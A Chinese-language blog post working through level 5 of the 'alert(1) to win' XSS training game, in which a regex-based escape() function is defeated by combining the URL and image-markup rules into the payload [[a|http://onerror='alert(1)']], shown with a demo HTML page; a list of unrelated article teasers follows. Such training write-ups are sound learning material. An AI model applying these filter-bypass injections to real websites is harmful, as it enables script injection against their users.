【20171025晚】alert(1) to win 第五題 正則表達式過濾

来源:http://www.cnblogs.com/heijuelou/archive/2017/10/25/7732677.html
-Advertisement-
Play Games

吃過晚飯,再練一題 第五題 分析: 技術點:正則表達式,html鏈接,img標簽使用 正則表達式: 第2行:替換s中所有的<和",用html編碼表示,點擊查看 HTML編碼表 正則表達式 g 代表全局模式,javascript replace 用法如下 第4行:將http://xx形式的內容替換成< ...


  吃過晚飯,再練一題

  第五題

  

1 function escape(s) {
2   var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;');
3   // URLs
4   text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
5   // [[img123|Description]]
6   text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
7   return text;
8 }

 

分析:

技術點:正則表達式,html鏈接,img標簽使用

正則表達式:

第2行:替換s中所有的<和",用html編碼表示,點擊查看 HTML編碼表

         正則表達式 g 代表全局模式,javascript replace 用法如下

   str.replace(regexp|substr, newSubstr|function)

第4行:將http://xx形式的內容替換成<a href="http://xx">xx</a>的形式

      () 是為了提取匹配的字元串。表達式中有幾個()就有幾個相應的匹配字元串。

第6行:輸入類似於

[[img123|Description]] 形式。

    正則表達式字元含義大全

 

TRY:

  1. 構造第三部的滿足彈出alert(1)的s

    成功的彈出img語句應該是

    <img alt="b" onerror="alert(1)" src="a.gif"> OK! 載入a.gif失敗,啟動onerror的alert(1),成功達到目的。

  2. 因為全局都將 " 替換了,所以不能用 " 閉合,所以要利用第4句構造滿足的句子。

   逆推一下,"b" onerror="alert(1)" 應該是一體的,轉換一下,"b" onerror='alert(1)' 去掉兩個雙引號,現在b之後的雙引號也不是我們輸入的,然後成為 "b onerror='alert(1)'",但是b之後的 " 還必須有,那麼必然是第4行提供的,哪裡提供呢?

  <a href="$1">$1</a> 替換 $1,即 $1就是b,所以又變為 http://onerror='alert(1)'。

  3. 兩者想合,構造 [[a|http://onerror='alert(1)']]

 

html渲染:

<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

</head>
<body>

<script type="text/javascript">
function escape(s) {
    var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}
var inputStr = "[[a|http://onerror='alert(1)']]";
var ok = escape(inputStr);
document.write(ok);
</script>

</body>
</html>

 

效果:

 


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • Php常見錯誤提示 一、Fatal error: Call to undefined function……函數不存在,可能的原因:系統不存在這個函數且你也沒自定義 二、syntax error, unexpected T_STRING, expecting……嚴重語法錯誤,例如syntax erro ...
  • 本文章將會繼承上一篇文章,主要講通過工具來進行日誌的收集與發送,《ELK系列~NLog.Targets.Fluentd到達如何通過tcp發到fluentd》 Nxlog是一個日誌收集工具,它將系統日誌,或者指定的日誌文件,統配符文件找到,然後加工,最後發送到目標位置。而目標位置有很多種,如文件系統, ...
  • 使用語法 首先我們先來看一個例子:html代碼: css代碼: 實現效果: 結果是該DOM元素背景變成了黑色。 CSS中原生的變數定義語法是:--*,變數使用語法是:var(--*),其中*表示我們的變數名稱。關於命名這個東西,各種語言都有些顯示,例如CSS選擇器不能是數字開頭,JS中的變數是不能直 ...
  • 一、介紹 沒錯,這是第五篇,到了引用類型,這次要分成兩次博文了,太多內容了,這是前篇,篇幅很長也很多代碼,主要講引用類型和常用的引用類型,代碼試驗過的,老鐵沒毛病。 堅持看堅持寫,不容易不容易,希望大家能在這博客中學到東西。能和大家分享,不錯不錯。而且啊,我想通過自己的認識,思考來得到一些個人見解, ...
  • 語法結構 try catch finally是ECMAScript-262 第三版提供異常處理機制的標準,語法結構如下: 語法與大多數語言一樣 如java .net,如果try{}代碼塊捕獲到了異常,那麼catch塊會得到一個錯誤信息對象(Error 的實例)。 我們應該把有可能發生錯誤的代碼放在t ...
  • url: 要求為String類型的參數,(預設為當前頁地址)發送請求的地址。 type: 要求為String類型的參數,請求方式(post或get)預設為get。註意其他http請求方法,例如put和 delete也可以使用,但僅部分瀏覽器支持。 timeout: 要求為Number類型的參數,設置 ...
  • 《大學》原文:大學之道,在明明德,在親民,在止於至善。知止而後有定,定而後能靜,靜而後能安,安而後能慮,慮而後能得。物有本末,事有終始,知所先後,則近道矣。 【譯文】大學的宗旨在於弘揚光明正大的品德,在於使人棄舊圖新,在於使人達到最完善的境界。知道應達到的境界才能夠志向堅定;志向堅定才能夠鎮靜不躁; ...
  • 在寫頁面的時候有時會遇到這樣的需求,需要兩個頁面之間傳遞數據或者一個事件。這個時候,就需要用到我今天所要講的storage事件,學習這個事件之前,需要先瞭解localStorage的用法。具體用法可以查看其他文檔。出發storage事件的條件如下: storage事件,只有在同源頁面下,才有作用,不 ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...